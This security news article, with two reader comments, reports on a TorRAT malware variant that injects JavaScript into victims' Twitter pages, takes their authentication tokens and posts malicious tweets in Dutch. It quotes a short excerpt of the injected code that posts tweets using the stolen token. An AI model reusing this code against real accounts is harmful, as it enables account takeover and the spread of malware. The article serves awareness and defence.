Dana Tamir, Enterprise Security Director for Trusteer has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page" Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by-malware pages, simply courtesy of the level of implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:

function _PostTweet() {
        var a = $('input[name="authenticity_token"]').val();
        a.length > 0 && $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }

Trusteer advises that enterprise exploit prevention technology, preventing vulnerable endpoint user applications (browser clients) from being exploited and malware downloaded and executed, is the best way stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted" Trusteer says "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".

146 Views
About the Author

A freelance technology journalist for 30 years, I have been a Contributing Editor at PC Pro (one of the best selling computer magazines in the UK) for most of them. As well as currently contributing to Forbes.com, The Times and Sunday Times via Raconteur Special Reports, SC Magazine UK, Digital Health, IT Pro and Infosecurity Magazine, I am also something of a prolific author. My last book, Being Virtual: Who You Really are Online, which was published in 2008 as part of the Science Museum TechKnow Series by John Wiley & Sons. I am also the only three times winner (2006, 2008, 2010) of the BT Information Security Journalist of the Year title, and was humbled to be presented with the ‘Enigma Award’ for a ‘lifetime contribution to information security journalism’ in 2011 despite my life being far from over...

Member Avatar
LastMitch

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.

This sound like an isolated incident maybe not if it starts spreading but it's good to know. So I can be aware with this javascript code.

Not sure why they used this phrase:

Our new King William will earn even more than Beatrix. Check his salary

What the meaning behind it.

To me it meant

Wee kin william will earn even mooar than beytrix. check 'is salary 
Member Avatar
diafol

Interesting. But how does the js get into a stored post in the first place? How is the script injected? I can understand that the js code is sent to the server, but doesn't Twitter screen and strip any possible malicious code?